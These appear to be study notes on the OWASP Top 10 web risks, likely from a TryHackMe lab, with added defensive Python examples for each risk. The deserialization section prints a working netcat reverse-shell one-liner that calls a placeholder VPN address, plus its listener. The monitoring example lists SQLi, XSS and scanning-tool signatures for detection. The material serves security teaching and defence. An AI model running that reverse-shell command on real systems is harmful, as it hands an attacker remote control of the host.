Open Web Application Security Project Top 10
1 - Injection
User input is handled as actual commands or code. Common examples:
- SQL injection
- Command injection / OS command injection: the webserver makes a system call on the host machine using the user's input, e.g. running
whoami
- attacker spawning a reverse shell through such a system call
Defending
- Allow list: only execute pre-allowed commands
- Stripping input: removing dangerous symbols from the input
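Added example (not part of the original notes): both defences above applied to a hypothetical web backend, with SQL injection shown beside its parameterized fix and an allow list for system calls. The database, table and action names are constructed for the example.

```python
import sqlite3
import subprocess

# Constructed sample data in an in-memory database (hypothetical app).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "alice@example.invalid"), ("bob", "bob@example.invalid")],
    )
    return conn

def lookup_vulnerable(conn, name):
    # Injection: the input is pasted into the SQL text, so a quote in the
    # input ends the string literal and the rest is read as SQL.
    sql = "SELECT name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, name):
    # Parameter binding: the driver passes the value separately from the SQL,
    # so it can never be read as code, whatever characters it contains.
    return conn.execute(
        "SELECT name, email FROM users WHERE name = ?", (name,)
    ).fetchall()

# Allow list for system calls: a request may name one of these actions;
# the argv is fixed here and never assembled from request data.
ALLOWED_COMMANDS = {
    "uptime": ["uptime"],
    "disk-usage": ["df", "-h"],
}

def resolve_command(action):
    # Returns the fixed argv for an allowed action, or refuses.
    if action not in ALLOWED_COMMANDS:
        raise ValueError(f"action not allowed: {action!r}")
    return list(ALLOWED_COMMANDS[action])

def run_action(action):
    argv = resolve_command(action)
    # shell=False: argv goes straight to exec, no shell metacharacter parsing.
    result = subprocess.run(argv, capture_output=True, text=True, check=False)
    return result.stdout

def strip_dangerous(text):
    # The "stripping input" defence from the notes, as a deny list. It only
    # catches the characters someone thought of, which is why the allow list
    # above is the stronger of the two.
    return "".join(ch for ch in text if ch not in ";&|`$<>'\"\\\n")
```

The vulnerable lookup returns every user for an input containing a quote and `OR`, while the bound version returns nothing for the same string because it is compared as a plain name.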
2 - Broken Authentication
Common examples:
- Brute Force Attacks
- Exploit weak credentials
- Weak Session Cookies
Defending
- Strong password policy
- Block brute-force attacks:
  - lock accounts after many incorrect attempts
  - use reCAPTCHA
  - block brute-forcing IP addresses
- Multi-Factor Authentication (MFA) / 2FA
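Added example (not from the original notes): a login path that hashes stored passwords, enforces a minimal password policy, and locks an account and a source IP after repeated failures inside a sliding window. Thresholds, the username and the hypothetical app are all assumptions; the clock is injectable so the lockout can be exercised without waiting.

```python
import hashlib
import hmac
import os
import time
from collections import defaultdict, deque

PBKDF2_ROUNDS = 100_000

def make_credential(password, salt=None):
    # Store a salted PBKDF2 hash, never the password itself.
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest

def verify_password(credential, password):
    salt, digest = credential
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)  # constant-time compare

# Hashed against for unknown usernames so their timing matches real ones.
_DUMMY_CREDENTIAL = make_credential("unused-dummy-password")

def password_policy_ok(password, min_length=12):
    # Minimal "strong password policy": a length floor plus a tiny deny list
    # (a real deployment would check against a breached-password list).
    return len(password) >= min_length and password.lower() not in {"password1234", "123456789012"}

class LoginGuard:
    """Counts failed logins per key (account or source IP) in a sliding window
    and locks the key once the threshold is reached."""

    def __init__(self, max_failures=5, window_s=900, lockout_s=900, clock=time.monotonic):
        self.max_failures = max_failures
        self.window_s = window_s
        self.lockout_s = lockout_s
        self.clock = clock
        self.failures = defaultdict(deque)  # key -> timestamps of recent failures
        self.locked_until = {}              # key -> time the lock expires

    def is_locked(self, key):
        until = self.locked_until.get(key)
        if until is None:
            return False
        if self.clock() >= until:
            del self.locked_until[key]
            self.failures[key].clear()
            return False
        return True

    def record_failure(self, key):
        now = self.clock()
        window = self.failures[key]
        while window and now - window[0] > self.window_s:
            window.popleft()
        window.append(now)
        if len(window) >= self.max_failures:
            self.locked_until[key] = now + self.lockout_s

    def record_success(self, key):
        self.failures[key].clear()

def attempt_login(guard, users, username, password, source_ip):
    """Returns 'locked', 'ok' or 'failed'. Unknown user and wrong password give
    the same answer so the form does not reveal which usernames exist."""
    keys = (f"user:{username}", f"ip:{source_ip}")
    if any(guard.is_locked(k) for k in keys):
        return "locked"
    credential = users.get(username, _DUMMY_CREDENTIAL)
    if verify_password(credential, password) and username in users:
        for k in keys:
            guard.record_success(k)
        return "ok"
    for k in keys:
        guard.record_failure(k)
    return "failed"
```

Locking on both the account and the source address covers the two brute-force shapes: many passwords against one account, and one password sprayed across many accounts from one address.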
3 - Sensitive Data Exposure
Webserver accidentally exposes sensitive data, e.g. customer names, orders, credit cards, passwords. Examples:
- Sensitive files left in a publicly accessible assets folder
4 - XML External Entity (XXE)
Vulnerability that abuses features of XML parsers/data. Possible abuses:
- File access
- DDoS
- Server-Side Request Forgery (SSRF)
- Port scanning
- remote code execution
What is XML?
eXtensible Markup Language is used to store and transport data between various systems and languages.
Two Types of XXE
In-band XXE
Immediate response: the result of the entity expansion comes back in the application's response.
Out-of-band XXE (blind XXE)
No immediate response. The attacker's payload must send the result to another file or to a server they control.
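Added example (not part of the original notes): a defensive XML loader using only the Python standard library. It walks an untrusted document with expat first and refuses any DOCTYPE or entity declaration, then builds the tree; the order document and the entity-carrying input are constructed for the example.

```python
import xml.etree.ElementTree as ET
from xml.parsers.expat import ParserCreate

class UnsafeXML(ValueError):
    """Raised when an untrusted document tries to declare a DTD or entities."""

def reject_dtd(xml_bytes):
    """First pass: walk the document with expat and fail on any DOCTYPE or
    entity declaration. External entities are the route to local files and
    internal hosts (SSRF); nested internal entities are the expansion DoS.
    Data exchanged by an application almost never needs a DTD, so refusing
    all of them closes both routes at once."""
    parser = ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE not allowed (root {name!r})")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXML(f"entity declaration not allowed: {name!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(xml_bytes, True)

def parse_untrusted(xml_bytes):
    # Second pass: build the tree only after the document passed the check.
    reject_dtd(xml_bytes)
    return ET.fromstring(xml_bytes)

# Constructed inputs: a plain order document, one declaring an external
# entity, and one with nested internal entities.
SAFE_DOC = b"<order><item>widget</item><qty>2</qty></order>"
XXE_DOC = (b'<?xml version="1.0"?>'
           b'<!DOCTYPE order [<!ENTITY ext SYSTEM "file:///path/on/server">]>'
           b'<order><item>&ext;</item></order>')
INTERNAL_ENTITY_DOC = (b'<!DOCTYPE d [<!ENTITY a "aaaa"><!ENTITY b "&a;&a;&a;&a;">]>'
                       b'<d>&b;</d>')

def is_rejected(doc):
    try:
        parse_untrusted(doc)
        return False
    except UnsafeXML:
        return True
```

Rejecting the DOCTYPE outright is simpler and safer than trying to disable individual parser features, because it does not depend on which features a given parser build turns on by default.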
5 - Broken Access Control
User is able to load pages that they should not have access to. Common examples:
- users are not properly verified when requesting private info such as an account page, e.g. they modify the request to
?account=admin
- fuzzing or similar page lookup
- IDOR - Insecure Direct Object Reference, e.g.
/profile?account=1337
could show account details that we don't have access to
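Added example (not from the original notes): the IDOR lookup above beside a version that authorises against the session. Account records, owners and the admin role are constructed for a hypothetical app.

```python
from dataclasses import dataclass

class Forbidden(Exception):
    """Raised when the session holder may not see the requested object."""

@dataclass
class Account:
    account_id: int
    owner: str
    balance: int

# Constructed sample records for a hypothetical banking app.
ACCOUNTS = {
    1: Account(1, "alice", 120),
    1337: Account(1337, "bob", 9000),
}

def parse_account_param(raw):
    # Only a plain positive integer is a valid id; "admin" and similar are
    # rejected before any lookup happens.
    if not raw.isdigit():
        raise ValueError(f"bad account id: {raw!r}")
    return int(raw)

def get_account_insecure(requested_id):
    # IDOR: the id from the URL is trusted as-is, so any logged-in user can
    # read any account by changing the number.
    return ACCOUNTS[requested_id]

def get_account(session_user, requested_id, roles=()):
    """Authorisation done server-side, against the session, not the request.
    The id is only a hint; ownership or an admin role decides. 'Missing' and
    'not yours' produce the same error so valid ids cannot be enumerated."""
    account = ACCOUNTS.get(requested_id)
    if account is None:
        raise Forbidden("account not found or not accessible")
    if account.owner != session_user and "admin" not in roles:
        raise Forbidden("account not found or not accessible")
    return account

def handle_profile_request(session_user, query_account, roles=()):
    # What a request handler would run: parse the parameter, then authorise.
    return get_account(session_user, parse_account_param(query_account), roles)

def is_forbidden(session_user, query_account, roles=()):
    try:
        handle_profile_request(session_user, query_account, roles)
        return False
    except Forbidden:
        return True
```

The check has to live on the server and read the identity from the session; hiding the id in the UI or relying on it being hard to guess is not access control.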
6 - Security Misconfiguration
Includes:
- default credentials
- unnecessary features enabled
- overly detailed error messages
- missing HTTP security headers
- misconfigured cloud services
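Added example (not part of the original notes): a small WSGI middleware that covers two of the items above, adding security headers (and dropping version banners) and replacing detailed error pages with a generic message unless debug mode is deliberately on. The header values, the demo app and the crash message are constructed assumptions.

```python
import logging
import sys

# Headers a hardened response should carry; assumed sane defaults for a
# plain HTML site, to be tuned per application.
SECURITY_HEADERS = [
    ("Content-Security-Policy", "default-src 'self'"),
    ("X-Content-Type-Options", "nosniff"),
    ("X-Frame-Options", "DENY"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Referrer-Policy", "no-referrer"),
]
LEAKY_HEADERS = {"server", "x-powered-by"}  # version banners: remove

def secure_headers(app, debug=False):
    """WSGI middleware: adds missing security headers, strips banners and
    replaces a detailed error page with a generic one unless debug is on."""
    log = logging.getLogger("app")

    def wrapped(environ, start_response):
        def sr(status, headers, exc_info=None):
            present = {name.lower() for name, _ in headers}
            kept = [(n, v) for n, v in headers if n.lower() not in LEAKY_HEADERS]
            extra = [(n, v) for n, v in SECURITY_HEADERS if n.lower() not in present]
            return start_response(status, kept + extra, exc_info)

        try:
            return app(environ, sr)
        except Exception:
            # Full detail goes to the server log; the client sees only a
            # generic message unless debug mode is deliberately enabled.
            log.exception("unhandled error for %s", environ.get("PATH_INFO"))
            detail = repr(sys.exc_info()[1]) if debug else "see server log"
            body = f"Internal error: {detail}".encode()
            sr("500 Internal Server Error", [("Content-Type", "text/plain")], sys.exc_info())
            return [body]

    return wrapped

def call(app, path="/"):
    # Minimal WSGI client for testing: returns (status, headers, body).
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"], captured["headers"] = status, headers

    body = b"".join(app({"PATH_INFO": path, "REQUEST_METHOD": "GET"}, start_response))
    return captured["status"], dict(captured["headers"]), body

def demo_app(environ, start_response):
    # Hypothetical app: sends a banner header and has an endpoint that crashes
    # with a message containing a constructed secret.
    if environ["PATH_INFO"] == "/crash":
        raise RuntimeError("db password is hunter2")
    start_response("200 OK", [("Content-Type", "text/html"), ("Server", "ExampleServer/1.2")])
    return [b"<h1>hello</h1>"]
```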
7 - Cross-site Scripting
Attacker injects a script into a website so that it runs in other users' browsers: reflected (the script travels in a request, e.g. a URL parameter, and is echoed back in the response) or stored (the script is saved by the server, e.g. in a comment, and served to every user who views it).
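Added example (not from the original notes): output encoding for both paths described above, storing comments raw and escaping at render time in the context where the value lands. The comment store and renderers belong to a hypothetical app.

```python
import html

# Comments are stored as submitted (the stored-XSS path) in a constructed
# in-memory store; escaping happens at output, where the context is known.
COMMENTS = []

def store_comment(author, body):
    COMMENTS.append((author, body))

def render_comment(author, body):
    # HTML text context: escape < > & " ' so the browser shows the text
    # instead of parsing it as markup.
    return f"<p><b>{html.escape(author)}</b>: {html.escape(body)}</p>"

def render_search_echo(query):
    # The reflected path: the query comes straight from the request and is
    # echoed into the page, so it gets the same treatment.
    return f"<p>Results for: {html.escape(query)}</p>"

def render_link(url, text):
    # Attribute context: quote the attribute, escape quotes, and allow only
    # http(s) so a javascript: URL cannot run when the link is clicked.
    if not url.lower().startswith(("http://", "https://")):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(text)}</a>'

def render_page():
    return "\n".join(render_comment(a, b) for a, b in COMMENTS)
```

Escaping belongs at output because the same stored string may be placed in HTML text, an attribute, or a script block, and each context needs different encoding; a Content-Security-Policy header limits the damage if one spot is missed.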
8 - Insecure Deserialization
Simply put, insecure deserialization is replacing the data processed by an application with malicious code.
(De)serialization
Serialization is the process of converting objects into a simpler format (e.g. binary) for transmitting between systems.
Deserialization is the reverse of serialization.
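Added example (not part of the original notes): two defences for the case where an application must accept serialized data from outside. The first restricts Python's pickle loader so the stream cannot name which class or callable is instantiated; the second uses a data-only format (JSON) with explicit shape validation. The order format and the sample streams are constructed.

```python
import builtins
import datetime
import io
import json
import pickle

# Globals the restricted loader will resolve: a handful of plain containers.
SAFE_BUILTINS = {"dict", "list", "tuple", "set", "frozenset",
                 "str", "bytes", "int", "float", "bool"}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # pickle calls this for every global the stream references (the class
        # or callable it wants to build). Anything outside the allow list is
        # refused, so the stream cannot choose what code runs.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()

def is_refused(data):
    try:
        restricted_loads(data)
        return False
    except pickle.UnpicklingError:
        return True

# Constructed streams: plain containers, and an object whose class the
# stream must import (datetime.date is outside the allow list).
PLAIN_STREAM = pickle.dumps({"item": "widget", "qty": 2})
GLOBAL_STREAM = pickle.dumps(datetime.date(2024, 1, 1))

# Preferred option: a data-only format plus explicit validation of the shape.
def load_order(text):
    obj = json.loads(text)
    if not isinstance(obj, dict) or set(obj) != {"item", "qty"}:
        raise ValueError("order must have exactly item and qty")
    if not isinstance(obj["item"], str):
        raise ValueError("item must be a string")
    if isinstance(obj["qty"], bool) or not isinstance(obj["qty"], int) or obj["qty"] <= 0:
        raise ValueError("qty must be a positive integer")
    return obj

def is_bad_order(text):
    try:
        load_order(text)
        return False
    except ValueError:
        return True
```

The allow list shows where the danger sits: a native serialization format lets the input name code to run, so the loader has to decide what it will resolve. JSON carries no such instruction, which is why it is the better default for data crossing a trust boundary.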
Spawning reverse shell
Target machine:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f
Attack machine:
nc -lvnp 4444
9 - Components with Known Vulnerabilities
https://www.exploit-db.com/
Meaning that the website framework or other components have known vulnerabilities. These can be abused easily, for example to spawn a remote shell.
10 - Insufficient Logging & Monitoring
Logging
Logging is essential. In case of an incident, we must be able to trace the attacker's actions.
Logging should contain at least:
- HTTP status codes
- Time stamps
- usernames
- API endpoints or pages
- IP addresses
Note! Logs must be stored securely and follow GDPR and other privacy laws.
Monitoring
With automated monitoring we can stop an attacker before a breach or incident. Things to watch for:
- multiple failed logins or other unauthorized attempts
- anomalous IP addresses
- detect automated tools
- speed of requests
- user-agent
- common payloads
- honey pots
- XSS attempts
- SQLi attempts
Monitoring alone is not enough; we need to take action on detected abuses. A firewall can be used for this, for example.
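Added example (not from the original notes): detection logic run over a constructed access log in the field layout listed under Logging above. It raises alerts for the monitoring items in the list (repeated failed logins, automated-tool user-agents, SQLi and XSS payloads) and turns them into a block list for the firewall step. Log lines, thresholds and signatures are all assumptions for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from urllib.parse import unquote

# Constructed sample log: timestamp, IP, username, method, path, status, user-agent.
SAMPLE_LOG = """\
2024-05-01T10:00:00 203.0.113.7 - POST /login 401 "Mozilla/5.0"
2024-05-01T10:00:01 203.0.113.7 - POST /login 401 "Mozilla/5.0"
2024-05-01T10:00:02 203.0.113.7 - POST /login 401 "Mozilla/5.0"
2024-05-01T10:00:03 203.0.113.7 - POST /login 401 "Mozilla/5.0"
2024-05-01T10:00:04 203.0.113.7 - POST /login 401 "Mozilla/5.0"
2024-05-01T10:00:05 203.0.113.7 alice POST /login 200 "Mozilla/5.0"
2024-05-01T10:01:00 198.51.100.9 - GET /search?q=%27%20OR%201%3D1-- 200 "sqlmap/1.7"
2024-05-01T10:01:01 198.51.100.9 - GET /profile?account=1337 403 "sqlmap/1.7"
2024-05-01T10:02:00 192.0.2.44 bob GET /orders 200 "Mozilla/5.0"
2024-05-01T10:02:01 192.0.2.44 bob GET /comment?text=%3Cscript%3E 200 "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<ip>\S+) (?P<user>\S+) (?P<method>[A-Z]+) '
    r'(?P<path>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)

# Thresholds and signatures (assumed values; tune to the application).
FAILED_LOGIN_LIMIT = 5        # 401s on /login from one IP ...
FAILED_LOGIN_WINDOW_S = 60    # ... within this many seconds
TOOL_UA_MARKERS = ("sqlmap", "nikto")
SQLI_MARKERS = ("' or", "union select", "or 1=1")
XSS_MARKERS = ("<script", "onerror=", "javascript:")

def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    rec["status"] = int(rec["status"])
    rec["decoded_path"] = unquote(rec["path"]).lower()  # payloads arrive URL-encoded
    return rec

def analyze(log_text):
    """Returns the set of (rule, ip) alerts raised over the log."""
    alerts = set()
    login_failures = defaultdict(deque)  # ip -> timestamps of recent 401s on /login
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # malformed line; in production, count these too
        ip = rec["ip"]
        if rec["path"].startswith("/login") and rec["status"] == 401:
            window = login_failures[ip]
            window.append(rec["ts"])
            while (rec["ts"] - window[0]).total_seconds() > FAILED_LOGIN_WINDOW_S:
                window.popleft()
            if len(window) >= FAILED_LOGIN_LIMIT:
                alerts.add(("brute_force", ip))
        ua = rec["ua"].lower()
        if any(marker in ua for marker in TOOL_UA_MARKERS):
            alerts.add(("automated_tool", ip))
        if any(marker in rec["decoded_path"] for marker in SQLI_MARKERS):
            alerts.add(("sqli_attempt", ip))
        if any(marker in rec["decoded_path"] for marker in XSS_MARKERS):
            alerts.add(("xss_attempt", ip))
    return alerts

def blocklist(alerts):
    # The "take action" step: source addresses to hand to the firewall.
    return sorted({ip for _, ip in alerts})
```

Decoding the path before matching matters because payloads usually arrive URL-encoded; a signature match on the raw request line would miss them. Signature lists like these catch the obvious cases and automated tooling; the brute-force rule is the one that needs the timestamp and status fields the notes ask for.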